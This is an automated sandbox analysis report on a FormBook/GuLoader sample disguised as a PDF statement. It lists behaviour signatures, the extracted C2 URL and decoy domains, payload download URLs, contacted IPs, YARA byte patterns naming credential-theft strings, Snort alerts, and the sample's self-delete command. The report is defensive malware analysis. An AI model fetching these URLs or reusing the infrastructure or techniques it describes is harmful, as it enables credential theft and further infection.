Edit tour

Windows Analysis Report
ekstre_pdf.exe

Overview

General Information

Sample Name:	ekstre_pdf.exe
Analysis ID:	844419
MD5:	a37dc47f86e84e5d0d2e6414c3cd5272
SHA1:	7c9a14ff443cc5de805200d6bcc750d64fb4b677
SHA256:	5902402fafb4be22faca64535718137ce5afd70004a14657daa9e7c6c3240feb
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Yara detected GuLoader

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Tries to detect Any.run

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

ekstre_pdf.exe (PID: 6632 cmdline: C:\Users\user\Desktop\ekstre_pdf.exe MD5: A37DC47F86E84E5D0D2E6414C3CD5272)

ekstre_pdf.exe (PID: 3132 cmdline: C:\Users\user\Desktop\ekstre_pdf.exe MD5: A37DC47F86E84E5D0D2E6414C3CD5272)

explorer.exe (PID: 4676 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

autoconv.exe (PID: 9804 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 469594005E3B94C5945BCCE7FC521C05)

cmd.exe (PID: 6400 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 6844 cmdline: /c del "C:\Users\user\Desktop\ekstre_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.7576128335.000000000AEC7000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xb52:$a2: pass 0xb58:$a3: email 0xb5f:$a4: login 0xb66:$a5: signin 0xb77:$a6: persistent 0xd4a:$r1: C:\Users\user\AppData\Roaming\60PBO7E5\60Plog.ini
00000000.00000002.3005389294.00000000052B5000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ekstre_pdf.exe PID: 3132	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x230563:$a1: 3C 30 50 4F 53 54 74 09 40 0x233ca5:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmd.exe PID: 6400	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x45b2d:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 24 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 38.163.115.131

Timestamp:	192.168.11.2038.163.115.13149855802031453 04/11/23-09:50:54.919147
SID:	2031453
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic .bin download from Dotted Quad - Source IP: 192.168.11.20 - Destination IP: 34.138.169.8

Timestamp:	192.168.11.2034.138.169.849844802018752 04/11/23-09:48:14.448694
SID:	2018752
Source Port:	49844
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 38.163.115.131

Timestamp:	192.168.11.2038.163.115.13149855802031412 04/11/23-09:50:54.919147
SID:	2031412
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.11.20 - Destination IP: 38.163.115.131

Timestamp:	192.168.11.2038.163.115.13149855802031449 04/11/23-09:50:54.919147
SID:	2031449
Source Port:	49855
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ekstre_pdf.exe	ReversingLabs: Detection: 18%
Source: ekstre_pdf.exe	Virustotal: Detection: 40%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin2	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin8	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin/	Avira URL Cloud: Label: malware
Source: http://www.furniture-42269.com	Avira URL Cloud: Label: malware
Source: http://www.anotherworldrecord.com/mi94/?3fK0g=JxoL4&_N6l56=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H	Avira URL Cloud: Label: malware
Source: http://www.centracul.online/mi94/	Avira URL Cloud: Label: phishing
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bino	Avira URL Cloud: Label: malware
Source: http://www.anotherworldrecord.com/mi94/www.credit-cards-54889.com	Avira URL Cloud: Label: malware
Source: http://www.centracul.online/mi94/www.iltuosentiero.com	Avira URL Cloud: Label: phishing
Source: http://www.furniture-42269.com/mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binQ	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binyj	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.binC	Avira URL Cloud: Label: malware
Source: http://www.furniture-42269.com/mi94/www.centracul.online	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin;	Avira URL Cloud: Label: malware
Source: http://34.138.169.8/wp-content/themes/seotheme/RenHLfAoTIbu98.bin	Avira URL Cloud: Label: malware
Source: http://www.centracul.online	Avira URL Cloud: Label: phishing

Source: 2.2.explorer.exe.114ff840.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.cmd.exe.874ae0.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.cmd.exe.359f840.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.crosswalkconsulting.co.uk/mi94/"], "decoy": ["realdigitalmarketing.co.uk", "athle91.com", "zetuinteriors.africa", "jewelry2adore.biz", "sneakersuomo.com", "hotcoa.com", "bestpetfinds.com", "elatedfreedom.com", "louisegoulet.com", "licensescape.com", "jenniferfalconerrealtor.com", "xqan.net", "textare.net", "doctorlinkscsk.link", "bizformspro.com", "ameriealthcaritasfl.com", "hanfengmeiye.com", "anjin98.com", "credit-cards-54889.com", "dinero.news", "naijastudy.africa", "cursosweb22.online", "furniture-61686.com", "furniture-42269.com", "emiu6696.com", "herhustlenation.com", "kevinjasperinc.africa", "hear-aid-92727.com", "goodlifeprojectofficial.com", "freshteak.com", "bellvaniamail.com", "peterslawonline.com", "analogfair.com", "fornettobarbecues.com", "6880365.com", "couragetokingdom.com", "luivix.online", "3ay82.xyz", "tmcgroup.africa", "canadianbreederprogram.com", "funtime28.online", "customcarpentry.uk", "anotherworldrecord.com", "aux100000epices.com", "edelman-production.com", "honorproduct.com", "danuzioneto.com", "iltuosentiero.com", "healthinsurancearena.com", "hunterboots--canada.com", "irestoreart.com", "lapalmaaccesible.com", "khbmfbank.africa", "laxmi.digital", "leqidt.tax", "fluffyjet.online", "chuckclouds.com", "bril-kre-l25.buzz", "centracul.online", "legacyengravers.com", "guesstheword.net", "ded-morozvrn.online", "lemonga.com", "crrgbb.com"]}

Source: ekstre_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ekstre_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: ekstre_pdf.exe, 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2932454534.0000000033CDD000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2937505788.0000000033E86000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.0000000003050000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.000000000317D000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.3038439625.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: ekstre_pdf.exe, 00000001.00000002.3100181991.0000000033ED0000.00000040.10000000.00040000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3033029052.00000000000A1000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3031995603.0000000003CD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7558532331.0000000000FF0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ekstre_pdf.exe, ekstre_pdf.exe, 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2932454534.0000000033CDD000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.2937505788.0000000033E86000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.0000000003050000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7559130925.000000000317D000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000003.3038439625.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ekstre_pdf.exe, 00000001.00000001.2824065477.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: cmd.pdb source: ekstre_pdf.exe, 00000001.00000002.3100181991.0000000033ED0000.00000040.10000000.00040000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3033029052.00000000000A1000.00000004.00000020.00020000.00000000.sdmp, ekstre_pdf.exe, 00000001.00000003.3031995603.0000000003CD8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.7558532331.0000000000FF0000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_00406873 FindFirstFileW,FindClose,	0_2_00406873
Source: C:\Users\user\Desktop\ekstre_pdf.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.163.115.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.91 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.11.56.48 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.154.110 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.190.63.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.121.87.199 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.223.253.105 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 62.149.128.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.246.164.134 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49844 -> 34.138.169.8:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49855 -> 38.163.115.131:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49855 -> 38.163.115.131:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49855 -> 38.163.115.131:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.crosswalkconsulting.co.uk/mi94/

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

